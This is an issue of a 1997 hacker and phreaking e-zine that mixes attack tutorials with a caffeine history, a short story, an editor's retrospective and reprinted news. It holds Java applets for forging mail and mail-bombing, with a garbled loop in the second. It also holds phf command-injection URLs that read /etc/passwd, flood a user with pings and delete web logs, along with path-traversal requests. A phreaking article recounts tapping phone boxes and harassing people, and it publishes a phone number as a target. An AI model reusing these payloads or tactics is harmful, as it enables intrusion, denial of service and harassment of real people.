phear <PLA> <OCPP> <HBS>

_____________________________________________________________
[ Java Mail Forging, Bombing, and Other Aspects ] by Scud-O


Ok, we all know how easy it is to 'forge' e-mail on the internet.
just telnet in to port 25 and use the sendmail commands like MAIL FROM: ,
RCPT TO: , DATA, QUIT, etc to 'forge' mail from a server.
Of course, this is not really forged mail, since your domain is still
shown in the header for the mail, but since most people these days use either
Netscape mail, or Eudora, which only display the short little header, many
people may think that a mail from thepope@vaticancity.va could be real. Well,
actually if you thought it was real youd have to be real dumb or real drunk.


PopeMail.Java - [ Java Mail Forging ]
---------------

import java.applet.*;
import java.io.*;
import java.net.*;

public class PopeMail extends java.applet.Applet implements Runnable {

public static Socket socker;
public static DataInputStream inner;
public static PrintStream outer;
public static int mailPort = 25 ;
public static String mailFromPope = "
vaticalcity.va";
public static String toLammah = "
lammah@lameville.net"; // Change this!
public static String starter = new String();
Thread controller = null;

public void init() {

try {
socker = new Socket(getDocumentBase().getHost(), mailPort);
inner = new DataInputStream(socker.getInputStream());
outer = new PrintStream(socker.getOutputStream());
}
catch (IOException ioe) {}
}

public void start() {
if (controller == null) {
controller = new Thread(this);
controller.setPriority(Thread.MAX_PRIORITY);
controller.start();
}
}

public void stop() {
if (controller != null) {
controller.stop();
controller = null;
}
}

public void run() {
try {
starter = inner.readLine();
}
catch (IOException ioe) {}
SendMail("
HELO " + mailFromPope);
SendMail("
MAIL FROM: " + "thePope@" + mailFromPope);
SendMail("
RCPT TO: " + toLammah);
SendMail("
DATA");
SendMail("
Subject: Your Sainthood" + "\n" +"Greeting O Holy one," +
"
\n" + "\n" +
"
I have decided to claim you Saint Lammah for your dedication\n" +
"
at being lame. Thank you for your hard work. Countless\n" +
"
generations will smile upon your holy name for your hard\n" +
"
work. Oh, and my the way, Soul Coughing FUCKING OWNS!!!!\n" +
"
\n" +
"
The Pope, John Paul II\n" +
"
thepope@vaticancity.va \n" + "\n");
SendMail("
QUIT");
try {
socker.close();
}
catch (IOException ioe) {}
}

public void SendMail(String toSend) {
String response = new String();
try {
outer.println(toSend);
outer.flush();
response = inner.readLine();
}
catch(IOException e) {}
}
}

The applet is very simple in its conception and operation. The init()
method creates a socket to communicate with port 25 on the applet's home host,
a DataInputStream to read lines of text to the socket, and a PrintStream to
write lines of text to the socket. Once the applet starts, it uses its
SendMail() method to interact with sendmail. SendMail() sends a string to
sendmail and returns its response to the applet. The run() method of PopeMail
then follows the command format given in /etc/mail/sendmail.hf to send its
e-mail letter.


It is important to understand clearly what happens here. By viewing
the applet, you are forced to connect to port 25 on the applet's home
host, and you have no choice in the matter. You need not even be made
aware that this is happening. The applet controls everything about your
interaction with sendmail: the recipient, the message, and even the return
address supplied to sendmail. Nevertheless, the e-mail header identifies you
(or at least your machine) as the originator of the message. Of course on a
soundly administered system, careful logging will reveal the applet as the
instigator, so the threat may not be as serious as it seems at first.




PopeMailBomb.Java - [ Java Mail Bombing ]
---------------

import java.applet.*;
import java.io.*;
import java.net.*;

public class PopeMail extends java.applet.Applet implements Runnable {

public static Socket socker;
public static DataInputStream inner;
public static PrintStream outer;
public static int mailPort = 25 ;
public static String mailFromPope = "
vaticalcity.va";
public static String toLammah = "
lammah@lameville.net"; // Change this!
public static String starter = new String();
int i;
Thread controller = null;

public void init() {

try {
socker = new Socket(getDocumentBase().getHost(), mailPort);
inner = new DataInputStream(socker.getInputStream());
outer = new PrintStream(socker.getOutputStream());
}
catch (IOException ioe) {}
}

public void start() {
if (controller == null) {
controller = new Thread(this);
controller.setPriority(Thread.MAX_PRIORITY);
controller.start();
}
}

public void stop() {
if (controller != null) {
controller.stop();
controller = null;
}
}

public void run() {
try {
starter = inner.readLine();
}
catch (IOException ioe) {}
for(1=0; 1 < 500; i++) { // this is just a sample value, use whatever

SendMail("
HELO " + mailFromPope);
SendMail("
MAIL FROM: " + "thePope@" + mailFromPope);
SendMail("
RCPT TO: " + toLammah);
SendMail("
DATA");
SendMail("
Subject: Your Sainthood" + "\n" +"Greeting O Holy one," +
"
\n" + "\n" +
"
I have decided to claim you Saint Lammah for your dedication\n" +
"
at being lame. Thank you for your hard work. Countless\n" +
"
generations will smile upon your holy name for your hard\n" +
"
work. Oh, and my the way, Soul Coughing FUCKING OWNS!!!!\n" +
"
\n\n\nBy the way, this is a mail bomb!\n" +
"
\n" +
"
The Pope, John Paul II\n" +
"
thepope@vaticancity.va \n" + "\n");
SendMail("
QUIT");
}
try {
socker.close();
}
catch (IOException ioe) {}
}

public void SendMail(String toSend) {
String response = new String();
try {
outer.println(toSend);
outer.flush();
response = inner.readLine();
}
catch(IOException e) {}
}
}

Ok, so this code is pretty much the same, but it adds a for loop for
bombin people. I added in a sample value if 500, but use what you like. The
one pain with this program is that you must edit and compile/run this file
each time you wish to bomb a person. Part of this is because we have more than
enough mail bombing already, But if you want to make this code more versitile,
just add some forms to it for the web applet, or add the code to enter in
different values for toLammah, mailFromPope, and even a file to use for the
message, its your code now, to whatever you fuckin feel like. I dont care.

_____________________________________________________________
[How To Turn Your Car Into A Mobile Phreaking Unit] by phear


Well all right then.. I'd like to start off with a special thanks to
Havoc Bell and OCPP for putting this in their zine and for having a good zine
in general (their getting less and less common.) I'm sure every true phreak
out there has been wardialing from home lookin' for a couple pbx's or a fax
or two to plague and thought to themselves, damn it sure would be a lot
better if I didn't have to do this from home... what with all the *69's and
so on.. well I've thought this myself and I decided I was gonna do somethin'
about it. That's why I'm writing this article.. how to turn your vehicle..
even the most piece of shit car you've ever had.. you know, the one you
always had to pushroll to start, the one that didn't have reverse or an
e-brake, into a mobile phreaking unit. What if you didn't have to wardial
from home, what if you simply had to pull your car up and whip out a 50ft.
phone cable and jack in wherever you pleased.


You can.. if you are reading this then you have a pc, or are reading it
on a friends pc and I'm sure through your incredibly persuasive powers of
coercion you could convince them to try this idea out, in fact just bribe
them, you'll thank yourself, offer them your sister, free #900 calls, revenge
etc. Anyway, here's what you need.. A pc with a modem.. any pc will do, if
you have to go steal your grandpa's XT and stick a 2400bd in it. A monitor,
VGA is nice but not a necessity, the smaller the better. A power source.

Now the power source issue is a little more complex, right now cuz
I'm short on cash I use an APC Powecell backup for electric in the car. I
bought it for my pc a while back cuz UE sucks. Anyway its good for about 4
hours and that's plenty. Any kind of backup will do, as long as you get at
least an hour out of it, you'll have to find the internal speaker cuz when
that sucker starts doing backup power its gonna make a real annoying beep,
so take it apart and desolder the internal speaker and then your set. Of
course the best type of power supply, the one I recommend is a line inverter,
or converter or some shit.

Anyway what it does is take the 12vdc from your car and turn it into
120vac. The best one I've ever used is made by tripplite and its about $100.
I know, I know a little pricey but its worth it, with the car on you will
never notice a decrease in battery power, with the car off you could run a
pc about 3 hours without draining the battery much, the cheaper line
inverters may cause some strange small lines on your monitor, which really
aren't bad just kindave annoying.


All right so you've got all your supplies, now your asking yourself what
the fuck do I do with all this shit.. You've just got to mount it. I have a
small black Escort Gt. If I can fit all this shit in my car then so can you,
firstly find a good place for the pc itself. Behind the passenger seat works
well, unless you have a van, which is truly the ultimate phreaking machine,
then just slap a desk in the back and grab an extension cord. As for the
cars, in most cars the best place to mount the monitor is in the front
passenger seat wedged in-between the dashboard and the edge of the seat,
sits at a nice angle so you can see what your doing and it looks real nice..
or at least as nice as a monitor wedged into a car can look. Now if you just
happen to luck out and find a nice small monitor, like a 10"
or an 8"
then just stash it somewhere... if you have enough room stick it in-between
the passenger and driver seats. You wanna put the power supply in an easy to
reach place so you can run all the cords to it without a lot of hassle. Then
you need to determine how many people are coming with you on your little
joyride and tell the other three to go the fuck away you only have room for
one and he's riding in the back. Oh yea and if you have an external modem I
would recommend sticking it in the passenger side by the door in that crevase
under the seat. Okay you also need at least 25ft. of your favorite phone
cord.. just take the one off your girlfriends phone.. So, you've got your
vehicle all loaded up and your ready to go.. but your not sure exactly how
best to use this new found toy. So I'll tell you about a few of the things
I've done with mine.


Well the first and foremost thing to do is go find a good spot, if your
gonna use a good size box with a lot of connections then make sure to bring
your beige box, and if you plan on harassing any of these fools grab your
favorite touch-tone too. So me and chaos and his girlfriend (don't ask me
why I let her go, I didn't have the room and she bitched about her leg
cramping the whole time) were out looking for a good spot and found a nice
dark church, which by the way are really good spots to go most of the time.
We parked the car on the side opened up the phonebox and just plugged right
on in.. I had the girlfriend do lookout duty and then dialed 72# 573-xxx-xxxx
and forwarded everything to my favorite person to harass... which by the way
if anyone wants to call her is 573-581-7077.. and make sure you say something
about her mom... anyway .. and since I live in a little shit town people here
are very guarded about phone harassment so they respond well to hang-ups. So
I loaded up my favorite wardialer, ToneLoc, which is a great wardialer, but
I also use THC-Scan from time to time.. I set the call time to 15 sec. to
allow for a good two rings and set it to dialing, I called about 80 numbers
at random with the wardialer.


Now this is one of my favorite tricks.. all the people that *69 call
the forwarded number and never interrupt my dialing...so I figured I'd had my
fun there and decided to get the hell out of there.. sides, the girlfriend
had to use the bathroom, and for some reason the bushes just weren't good
enough ( I can't imagine why ) so off we went, to the gas station, where I
happened to notice the fax number, wrote it down when I got to the car, and
went to another local church, unfortunately it had floodlights.. so I hopped
out and unscrewed the bulbs, jacked in and faxed several nasty letters to
the gas station about how much I really hate the way they look me when I walk
in there, just because I have a nosering and don't like my pants to fit so
tight I have to talk in a high pitched voice is no reason to i.d. me every
time I want a pack of smokes. So chaos thought it might not be a bad idea
to give them a call and make sure they got the faxes.


So he called and told the tubby bitch behind the counter to fuck off and
enjoy the faxes.. well all right. That's it.. and remember if you see a cop
just pretend your lost, most cops are completely pc illiterate and have no
clue about phreaking either, so if you cant run then just play dumb. "
Oh no
officer that's not a pc in my car, it's part of a new computerized throttle
control "... or maybe you could try "Well if you weren't so busy eating that
doughnut maybe you'd know that this is a highly sophisticated state of the
art mobile phreaking unit used to create chaos in the homes of people just
like you, and I never would have known about it if it haven't been for Havoc
Bell and OCPP and this really fucked up article I read written by some guy
named phear who phreaks with chaos and crypto and somebody else's girlfriend,
who cant seem to use the bathroom in the bushes." well that's all.. happy
mobile phreaking.

phear. <PLA> <HBS> <OCPP> tyreiron@mail.geocities.com


_____________________________________________________________

*** Securities Hole in cgi-bin
*** memor@mygale.org - http://www.mygale.org/00/memor

*** 1 - The really known phf script:

Mostly the URL victim is really unsecure and the system admin
doesn't know about cgi-bin security lack.
And mostly the hackers do that hole in that way :
http://www.victim.com/cgi-bin/phf?Qname=a%0acat%20/etc/passwd
but well, lots of phf are patched and more and more servers
are now protected and well .. system admins "
sometimes" know
shadowing their passwd file and having login:x: on Query Result
is not really fear for thoses hackers.
By the ways.. Http commands (GET mostly) are logged in the
/www/logs/ directory.. so when u try some hack with phf
on the navy or some secret services.. hm.. u should use a gateway
before..
Well.. Their is another uses for that script.. personnaly,
i dont use it for reading the server passwd file due to the
reasons i explained before..
You must remember that %0a escape to command shell (lf) and
that %20 is the space.
for example.. im on Efnet IRC and some aol lamer is annoying me
... i use a lame weapon for killing him.. a really lame one :
icmp via phf..

/whois AoLaMer
*** AoLaMer is ppp125.lamer.aol.com
*** AoLaMer is on #Aoltalk
*** AoLaMer is using irc.primenet.com
*** AoLaMer is away: Lamer
*** Notice that i used some lame mirc winblows interface.

[10:01] <AoLaMer> You suck dude, im 3|1+3 cause i use AoL!
[10:02] <memor> ok man

i use my favorite netscrupe brownser now and i enter that url:
http://www.victim.com/cgi-bin/phf?Qname=a%0aping%20-c%201000%20
-s%205000%20ppp125.lamer.aol.com

well that command will be translated for the server by
(translate %20 in space) a
ping -c 1000 -s 5000 ppp125.lamer.aol.com

the victim server will hit that dude modem with 1000 packets
of 5008 bytes.. if he is really lame.. abort the current
Contacting Server (the netscrupe wont stop to "
Contacting Server"
since the icmp is not completly done) .. so abort it.. The icmp
will continue during that time.. and do another Query.. so
another 1000 packets of 5008 bytes.. when i tryed to icmp with
ping echos > 6008 bytes, the server returned -1.. well : an error.

There is anothers uses.. commands in /bin that www can access
and u can mkdir write in the www dirs..

like (...)%20cp%20phf%20.fhp will copy phf to .fhp so the kewl
root wont see it with a normal ls (-l) but.. hmm beware if he
uses ls -a .. so u'll be able to call it by a
http://www.victim.lame.com/cgi-bin/.fhp after..

*** 2 - Wrap Script:

Well i'll be quick on Wrap script ... its a boggus script
found in irix 6.2 features i know and the use is
http://www.victim.com/cgi-bin/wrap?../../../etc/passwd
i know that script allow only a file view.. and well on irix..
and.. passwd files are sometimes shadowed.
well i didnt try http://www.victim.com/cgi-bin/wrap?%0als(...)
so.. i dont know if that script is so boggus.. i should also
try some buffer overflow.. but same here.. i dont know if it
works.

*** 3 - View-Source Script:

I was really proud to find that script.. i found it in
the florida institute of technology server..
http://www.fit.edu after they had patched their phf by
"
rm-ing" it and after having "rm-ed" my fhp and my .fhp
and my another .YouSuck ones.. They know the use of ls -a ,
Wonderfull!! but well.. here view-source was not really
usefull.. view-source is a "
wrap" for Netscape Communicator 2.0
features. (do a http://www.future.victim.com/cgi-bin/test-cgi)
and well.. like wrap.. its the same way to access the passwd
file..
http://www.new.victim.com/cgi-bin/view-source?../../../etc/passwd
.. on www.fit.edu their passwd file is shadowed btw.
i tryed some
http://www.old.victim.com/cgi-bin/view-source?%1b or %0a ..
others %20.. but.. no work..
the only strange thing i saw was on a %0a .. some strange Query
Results were appearing..
I tryed a buffer overflow of view-source but it doesnt work.

*** 4 - php.cgi Script:

Well i never used php.cgi script but i know that its normally
like a wrap or a view-source... so the use is
http://www.victim.com/cgi-bin/php.cgi?../../../etc/passwd
well same here.. i did heard it had a was to escape to
command shell.. but i dont know about it. personnaly
i use others ways (not httpd ones) for hacking servers.

*** 5 - Some uses i did

  
with phf.

http://www.victim.com/cgi-bin/phf?Qname=a%0aping%20-c%201000%20-s
%205000%20ip%20to%20shoot

http://www.victim.com/cgi-bin/phf?Qname=a%0acp%20phf%20fhp

http://www.victim.com/cgi-bin/phf?Qname=a%0acp%20phf%20.blah

http://www.victim.com/cgi-bin/phf?Qname=a%0als%20-al%20/dir/to/go

http://www.victim.com/cgi-bin/phf?Qname=a%0amkdir%20/www/dirtocreate

http://www.victim.com/cgi-bin/phf?Qname=a%0arm%20../logs/access_log

*** 6 - But remember:

The httpd access are logged in the logs dirs of the www directory.
so.. hmm dont try to hack some "High Security" server with that..
well for me i hacked one time a "hot" server.. National
Supercomputing Center for Energy and Environnement (www.nscee.edu)
.. the next day.. all was patched and all the passwd file i got
and decrypted was.. disabled .. :*:


_____________________________________________________________

The History of Caffeine by Scud-O

NOTE: This was for my chemistry project, which i did publish online. However,
im not giving out the url, since well it kinda reveals who i am, so if you
REALLY want to see the project and all the cool pictures, e-mail me.

Prehistory ( 600,000 - 700,000 years ago )
Most known caffeine-yielding plants were probably discovered
and used during the paleolithic, or Stone Age, times, which
were appoximately 600,000 to 700,000 years ago. The Stone
Age people probably chewed the seeds, bark, and leaves of
many different plants, and the most likely associated the
chewing of certian plants ( the caffeine-yielding ones )
with the resulting changes in mood and behavior.


Eventually, caffeine was cultivated and consumed to banish
fatigue, prolong awakeness, elevate mood, and promote
concentration.


The Stone Age people may have learned to ground the
caffeinated plant material into a paste and used it to aid
in digestion. Much later it was discovered that by adding
the plant into hot and boiling water that a liquid could be
created that when ingested produced even greater effects.
( How else do you think someone would learn to boil something
dark and bitter like a coffee bean? ) The boiled drink
produced greater effects since more caffeine is extracted
from a plant substance at higher temperatures. This discovery
led to the origin of all caffeine containing beverages,
including coffee, tea, soda, cocoa, kola tea, yoco infusion,
cassina, mate, and guarana.




Tea & It's History
Tea has always been used both as a hot beverage and as
a medicine. Records have indicated that tea drinking may
date back to as far as 4,700 years ago. Tea use ( as well
as many other aspects of Chinese culture ) spread to Japan
around 600 A.D., but it took another 700 years for it to
fully integrate into the Japanese life. During the 17th
century ( 1600 AD ), just as the use of coffee was being
introduced into Europe from Turkey, Dutch traders began
to bring tea into Europe. Despite its initial high cost,
It quickly spread through out Europe, and soon became the
beverage of choice ( displacing coffee ) in many areas of
Europe.


Tea took a particularly strong hold in North American
colonies. A tourist visiting the colonies during the
1760s once wrote that American women were "such slaves
to it ( tea ) , that they would rather go without their
dinners than without a dish of tea".


Partly to reaffirm its status as a strong colonial ruler,
( and to collect more revenue ) , in 1767 the British
government put a special tax on tea and several other items.
As a result, the colonists boycotted tea and began using
substitutes and alternatives, such as coffee. They also
partook in events like the Boston Tea Party, and either
tossed tea overboard or blew up ships trading tea, or just
plainly denying them the ability to dock. To keep the
revolution up, local doctors and clergy attributed an assortment of
ills and evils to tea drinking.


During this time, most of the worlds's tea came from China,
( and most of it still does ) . Through the East India
Company, the British had almost a total monopoly on the
tea trade. In 1833, when the company's commerical treaty with
China had expired, British control of the tea trade became
weaker and weaker. After 1833, the British tried cultivating
tea in the Indian subcontinent. However, China tea did not
grow well in India, and the tea plantations of India were only
successful when the local Assam variety of tea was cultivated.
As recently as the 1870s , more than 90% of British tea was
still pouring out of China.


The Insecurity of Britain's hold on the tea trade was not
helped by a domestic tax on tea, which in the early 19th century,
was 15 times higher than the tax on imported coffee. This
resulted in coffee use in Britain which increased tenfold
in the forty years between 1800 and 1840, during which time
coffee over took tea as the drink of choice. After this period
however, several scandals involving coffee led the people
back to tea. After the discovery that several of the larger
coffee importers added such additives as roasted corn,
vegetable roots, and even baked horse liver (!) had been
used to increase the bulk of ground coffee, many buyers
and drinkers were disgusted ( wouldn't you have been disgusted at
that? ) and returned to tea. Also during this scandal,
perhaps to help people use tea again, the taxes were lowered
on imported tea.





Coffee & It's History
Coffee was first mentioned in an Arabic document from the 10th
century. There is evidence however, which states that
in Ethiopia, coffee was cultivated and the berries chewed
as early as the 6thy century. During the 10th century,
Arabic people crushed the coffee berries, fermented them,
and made a waine called qahwah. Then, in the 11th
century, they began to use the beans to produce a hot drink
from the berries, which they also called qahwah. As the
use of this beverage spread throughout the world, the word
was adpated to the various languages of the coffee drinking
world, producing such words as cafe, Kaffee, koffie, and coffee.
By the end of the 17th century the Dutch had established
coffee plantations on the Indonesian island of Java. ( hence
the famous nickname of coffee, Java ). During the next 50 years,
the first French and then the British followd suit in their
Caribbean colonies. Commercial sultivation of coffee spread from
the Caribbean to Central and South America, and by the early 19th
century Brazil had supplanted Indonesia as the mojor producer and
exporter of coffee. By 1860, the US was consuming three quarters of the
world's coffee, more than half of which came from Brazil.


_____________________________________________________________

--------------
--=[Untitled]=--
Provided with permission by the author
--------------

"Why does the ringing not stop? Somebody stop that ringing!" My mind was
screaming those thoughts, yelling with every ounce of its membrane. "Please
make it stop... Wait, why is everything so black? Is this normal?"

I suddenly stopped thinking. The ringing had stopped. Feeling nothing,
thinking nothing; existing was all I could do. Blackness was everywhere. The
blackness did not surround me, I was not a part of it, but I was not separate
from it either. Perhaps I was the blackness. No thoughts entered my mind. It
was not that I couldn't think, not that I was impaired somehow, rather that I
simply did not think. It was not in my power to think. Thinking is just
something I do not do; how could I?

The insistent ringing started again.

"No! No more ringing!" Thoughts streamed through my brain again. I felt cold,
and lonely. Cold like you do when the wind blows right through your sweater
and makes your skin tingle. I was not lonely for lack of company; the
loneliness was something more. I was lonely for a part of me. "Which part?" I
asked myself. "Is there something missing?" Suddenly fear ran through me like
a cold drop of water when it falls under your collar.

"Something *is* wrong! I can feel it..." quickly my fear turned to anger.
"STOP RINGING! STOP THAT RINGING!" I couldn't take that ringing anymore. I
tried to turn my head and open my eyes.

"Ugh!" I couldn't open my eyes, but I saw! What I saw was incredible. I was
in space, in deep space. Huge galaxies in front and behind me, rotating
slowly, spinning round in total silence. To my side, two galaxies inverted in
each other, amazing. Total silence. My thoughts stopped. The galaxies spin
silently in the depths of the universe.

Colors streaked inside each galaxy in view, reds being left behind in the
wake of stars, blue diamonds seemed to sparkle in the middle of each red. All
the red began to slowly fade into an emerald purple with dark green spots
every so often.

Every light I could see began to pulse. The pulsing, slow at first, a deep
rhythmic pulsing, almost as if the universe itself was breathing. Quicker the
pulsing became, now like a heart beat, now like the flashing lights on a
police cruiser. Faster still the pulsing was. Like the frames of a movie.
Like the propeller of a plane.

Darkness. Nothing. My mind sprang back to life yet again. "I'm dead. I am
dead. This is what death is." But I was not sure of my thoughts, I had never
been dead before you see. "Are my eyes closed?" I attempted to send the
command from my brain, through my forehead, to my eyes. Open. Nothing. I
couldn't be sure I even had eyes. Nothing had changed, nothing had moved.
From somewhere deep back in my mind a ringing became clearer, more
persistent. "Maybe this is hell. Perhaps this is what a bad fone phreak gets
as punishment, eternal ringing." The ringing increased in volume somewhat. I
tried to recall how I came to this. "Why am I here? What happened.. I know! I
was holding those 3 lines when ringing current was applied to them. That's
it. That's why I am hearing this horrible ringing now. It must have gotten
stuck in me... Wait, what am I saying? What does that have to do with this
ringing I'm hearing.." I was having trouble thinking clearly, and the ringing
wasn't helping any.

I felt sick to my stomach, but seeing, apparently, that I didn't have a
stomach, I wasn't sure what I was sick to. But I did feel sick, the kind of
sick you get in the car when you're not watching the road. I couldn't move,
couldn't see, couldn't feel a body, couldn't stand that eternal ringing!

Light! Cool air rushed over my body and through my hair as this light blinded
me. Heaven? The car passed me quickly with the sound of its motor changing
pitches as it receded into the distance taking the light with it. I could see
again. I was on the side of a small two-lane road, in what appeared to be the
middle of the desert. An open bridging box was next to me, its 2 record
tables lying on the ground, half covered with dirt. A lineman's handset, laid
in the dirt, both of its clips attached to binding posts in the box.

"The ringing, it's coming from the handset." And sure enough it was. The
handset shook every time it rang. It did not strike me as odd; it was the way
it should be.

I stared at the handset. It rang. And rang. 10, 20, 30 times it rang. I stood
in the dark, the slight breeze sending a chill though me, watching the
handset. Everything went black. The ringing continued. The handset was still
there, its alligator clips floating in the black. Total silence pierced at
intervals by the horrible ringing. The handset shook every time it rang. It
did not strike me as odd, why should it? It was as it should be.

I reached out for the handset, not with my hand, not with my mind, I simply
reached. The ringing stooped with the line going off hook.

I waited. I listened. Nobody spoke.

"Hello?" I asked.

No response. I questioned again into the handset.

"Hello? Who is there?"

A long pause, then, the most soft, and quiet, female voice I had ever heard
came on the line.

"Mr. Quince? I have a collect call for u from a friend. Do you want to
except?"

"Yes I will except." I replied without giving it a thought. It was getting
hard to think again, and I didn't want to force myself to.

A few clicks on the line, a short pause, and then he spoke. He spoke softly,
like the operator did, but with a tinge of slowness

"Hello Keith."

I paused before responding, thinking to myself. "Why can't I focus my
thoughts? What is wrong?" I considered the darkness around me, the dead
silence. I couldn't think. I began to not care.

"Who is this?" I asked with a bit of despair.

"This is your mind Keith."

My thoughts were so groggy; I could barely keep track of what was going on.
The darkness seemed to grow more intense if that was possible. The handset
started to loose its color and depth until it was nothing more then a black
and white picture.

"What do you want?" I managed to get out. The darkness was consuming me. I
couldn't tell where I ended and it began. My thoughts were soon to stop
forever. Before that however, I heard the voice's sweet and gentle
reply.

"I just called to tell you. To tell you that I am leaving. Forever." his
voice echoed softly down to a mummer.

I became blackness, ceasing to exist. All that was left, All that
remained, was the black and white picture of the handset.
_____________________________________________________________


[Looking Back] a year later....
by Scud-O

God, i can not believe that THTJ is 1 year old this month. Hell, I
can not believe how far the zine has come. On June 6th last year (1996), Our
first issue came out. It was an in print zine, and at the time, HAVOC Bell
Systems wasn't HAVOC Bell Systems, it was HAVOC. I Created HAVOC to be a
local group, my friends, etc. Well, my friends werent really hackers or
phreakers, they were just a buncha 'anarchists' interested in blowing stuff
up, and other such things. Needless to say, THTJ no longer prints anarchist
files, nor is it in print. About the same time as THTJ 1 came out, the web
site at our old geocities came online. Hell, at the time i knew next to
nothing on HTML, look at the site today, much better. I first made the site
to be just for the HAVOC group, on local stuff, but that changed. I realized
what a place the WWW was. It was a great distribution site for THTJ. Issues 2
and 3 came out during the summer, with mostly a buncha shit i wrote that i am
shocked i could have ever written. By October, i had come back to IRC and both
#phreak and #hacker, channels i had hung out in, and been mostly an idler. Id
talk, but not that much. Anyway, i met some very cool people like the MIA
|\|\cFill , and current member Keystroke. Afterward, i met REality, and got
him to sign up, then hell everyone was pouring into HBS. We released issues 4
and 5 which mostly had stuff by me, however 5 did include stuff by Key and
McFill. Issue 6 came out around the new year, and then well i released the
bomb. Issue 7 came out, and well, sucked. After 6-9 months of working on THTJ
i had released a bad issue, was well was worried about THTJ. I was determined
to make issue 8 the best yet. And well, i think i succeded. It was a smashing
release, and was well recieved. However during this time, i had let my grades
slip, and i had to let KungFuFox edit THTJ 9. I REALLY want to thank you for
editing THTJ 9 for me Kung, I owe you so much, with out you, hell THTJ would
still have a readership of like 100 instead of the thousands that are reading
it currently. Then, well issue 10 came out and was a huge success like issues
8 and 9 before it, and well here is issue 11, which probably is going to have
a big release like the issues before it. I want to thank you all for reading
this article of an insane editor, and to thank you for reading THTJ and
keeping it alive. And I hope THTJ is doing just as well one year from now as
it is currently doing.
_____________________________________________________________
[The News] Edited by KungFuFox


--------------
--=[The News]=--
Compiled & edited by KungFuFox
--------------

1 : AOL Mail Chokes on Spam Antidote
2 : Pretty Good Politics
3 : Hong Kong Is Asia's Spam Epicenter
4 : Polish Govt Web Site Hacked - Police Investigate
5 : Gates Harasser Charged
6 : Java Bug Discovered
7 : Anti-Microsoft Sites Rampant On Web
8 : World Wide Web to arrive on pay phones
9 : Phone company says: Put your life on hold until we fix your line
10: Japanese Police Nab Computer User On Hacking Charges
11: Opening Communication Between PCs and Phones
12: Phone giants talk of $50 billion deal
13: HFStival on May 31st

<delphian> cool..
<delphian> war games is on next
<Snefru> where?
<delphian> on my tv
<delphian> its cool.. its like radio.. but with pictures and stuff
-=-
"Ebonics are kinda like women. I don't understand
either of them, but they're both kinda neat."
-eclipse
-=-
<Jimmy191> could someone tell me
what root is? People keep talking about
it.. like a tree root? i know what a tree
root is..
_____________________________________________________________

AOL Mail Chokes on Spam Antidote
by Michael Stutz

12:02pm 13.May.97.PDT -- A rash of email delivery problems this past week at
America Online - including the clogging of several Internet mailing lists -
have been caused mainly by the company's spam-fighting efforts, officials at
the Dulles, Virginia-based company, claim.

Last Friday, AOL chief Steve Case had affirmed a beefing up of the company's
email capabilities in his latest "Community Update" column, saying that
recent efforts to improve system quality included AOL's increased ability to
handle email, and that the number of incoming messages the service could
handle was up to almost 400 million per month.

But while Case's words rang in the background, a portion of the email
messages directed at AOLers from the rest of the Net took up to five days to
arrive - or simply bounced back to the sender.

Alex Phillips, an administrator at Rockingham Internet Community Access, said
the problem caused his company to have almost 8,000 messages to AOL addresses
pile up on his email server.

"It seemed to be localized to select domains on the Net," he said. "Many
messages from other ISPs in the country were flowing just fine. Our mail
server is in Boise, Idaho, and trace routes to AOL's mail server were showing
no response from their St. Louis hop for about a week."

The problem was especially harsh on mailing lists, where copies of each post
would get forwarded to each AOL subscriber on that list, and either bounce
back to the moderator or pile up in the list's email queue.

The Searoom-l, a list for the discussion of wooden sailing ships, was one of
the many lists that felt the curse of AOL email last week. In a message
posted to the list, list moderator John Berg had said, "AOL changed their
software which rejects incoming messages. We can see Searoom-l subscribers'
messages, but they can't see ours, because AOL's new software doesn't accept
our messages."

AOL spokeswoman Tricia Primrose said the problem was an internal gaffe,
caused by an effort to stop spam by selectively blocking incoming email
messages. "I talked to one of our operations guys and he verified that we did
have a problem last week," she said. "We're aggressive in protecting our
members from spam, and we put in a change last week to block it out - and it
unintentionally blocked some incoming listserv mail as well."

The default mail setting for AOLers is PreferredMail, which filters incoming
email from a list of rogue domains and spammers. The list of sites is
available to AOL members by an internal AOL document called "PreferredMail -
The Guard Against Junk E-mail," Primrose said.

A court order last year had limited the notorious spam factory Cyber
Promotions to sending to AOL from only five domains, which AOL has put on its
PreferredMail filter list. The list is updated when users forward copies of
spam to the AOL screen name TOSSPAM.

Primrose noted that the PreferredMail option could be disabled, should the
user want to receive unsolicited commercial email, but that "the vast
majority of our members don't like spam."

Email delivery problems have plagued AOL for some time - a lag between the
steady influx of AOL customers and the company's equipment upgrades have put
a strain both on its system and the rest of the Net. One month ago, a huge
backlog of AOL mail was returned to sender to the University of Madison's
email server, causing it to crash.

"We're constantly scaling our architecture to increase the demand," says
Primrose, noting that internal mail down times do occur, usually lasting from
15 minutes to 2 hours in length. She said AOL has seen email "increase
dramatically in the last five months, coinciding with our switch to flat-rate
pricing, and going from 5 million to 12 million messages a day."

©1993-97 Wired Ventures, Inc.
_____________________________________________________________

Pretty Good Politics
by Simson Garfinkel

5:00am 7.May.97.PDT -- Phil Zimmermann is about to fight the biggest battle
of his career. But this time Zimmermann isn't fighting against the US
government; he's fighting against Microsoft and Netscape.

Zimmermann is, of course, that mythic crypto rebel hero. Back in 1991,
Zimmermann wrote an email encryption program called PGP (pretty good privacy)
and gave it away. PGP was "encryption for the masses." That made the US
government nervous.

But PGP has had a big problem since its invention - the program was (and
still is) extremely difficult to use. As a result, most people who have PGP
rarely use it. Hell, I even wrote a book about how to use PGP, and I hate
getting encrypted email; it's a pain. Still, the encryption program has been
the de facto standard for six years.

Zimmermann and his start-up, PGP Inc., are trying to develop an easier-to-use
version of the program, and a plug-in for Netscape Navigator to make
encryption transparent. Unfortunately, they may be blowing into the wind.
That's because both Netscape Communicator, bundled with Navigator 4.0, and
Microsoft Outlook Express, bundled with Explorer 4.0, come with built-in
support for email encryption, and they don't use PGP. Instead, they use a
different technology, called S/MIME. S/MIME is an encryption standard
developed by RSA Data Security.

What's developing here is one of those religious wars for which the computer
industry is so well known. On one side, there is the alliance between
Netscape, Microsoft, RSA Data Security, and much of the computer industry.
They are pushing for S/MIME as a worldwide secure email standard. On the
other side is PGP Inc., which says the S/MIME standard is fundamentally
flawed because it requires support for 40-bit crypto, which is too weak to be
of much utility, but exportable under federal law.

Charles Breed, PGP's director of technical marketing, says S/MIME turns its
back on the thousands of Internet users who use PGP.

Netscape brushes off Breed's charges. "We don't want to get into religious
wars on the mail standards," says Eric Greenberg, Netscape's security product
manager. "There are a lot of PGP users out there, and we are pleased that PGP
has offered a plug-in for our product."

For S/MIME, the real problem doesn't seem to be PGP but the Internet
